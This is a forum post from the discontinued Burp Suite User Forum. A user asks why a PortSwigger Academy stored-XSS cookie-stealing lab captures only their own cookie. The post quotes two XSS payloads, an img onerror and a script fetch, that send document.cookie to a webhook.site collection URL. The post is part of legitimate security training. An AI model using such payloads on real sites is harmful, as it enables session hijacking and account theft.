Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Acedemy Lab Practitioner level: Exploiting cross-site scripting to steal cookies

TheWhiteBoot | Last updated: Nov 13, 2022 08:47PM UTC

Hi User form, I'm currently trying to solve the "Exploiting cross-site scripting to steal cookies" lab (https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies), and I successfully exploited the comment functionality as the lab description says: "This lab contains a stored XSS vulnerability in the blog comments function.", so to steal the victims cookie I'm using the online tool webhook.site. this is my payload: <img src=x onerror=this.src='https://webhook.site/78b1e425-8c1b-4321-9ced-c924a3ebe6f4?cookie='+document.cookie;> But this only sends my own cookie to the webhook website... So I thought maybe it has to do something with HTTP verbs. The img payload creates a GET request, so maybe it needs to be a POST request. I tried that, but again, only sends my cookie. So I peaked at the solution and saw that it was using Burp professional with the Burp Collaborator. But this lab can be solved without Burp professional right? I'm using Burp Community because I do not have the money to pay for the Professional version... I also used the payload from the solution but I do not get the victims cookie... This is my payload: <script> fetch('https://webhook.site/78b1e425-8c1b-4321-9ced-c924a3ebe6f4', { method: 'POST', mode: 'no-cors', body:document.cookie }); </script> Can anyone tell me what I am doing wrong? Kind regards, TheWhiteBoot

Ben, PortSwigger Agent | Last updated: Nov 14, 2022 12:08PM UTC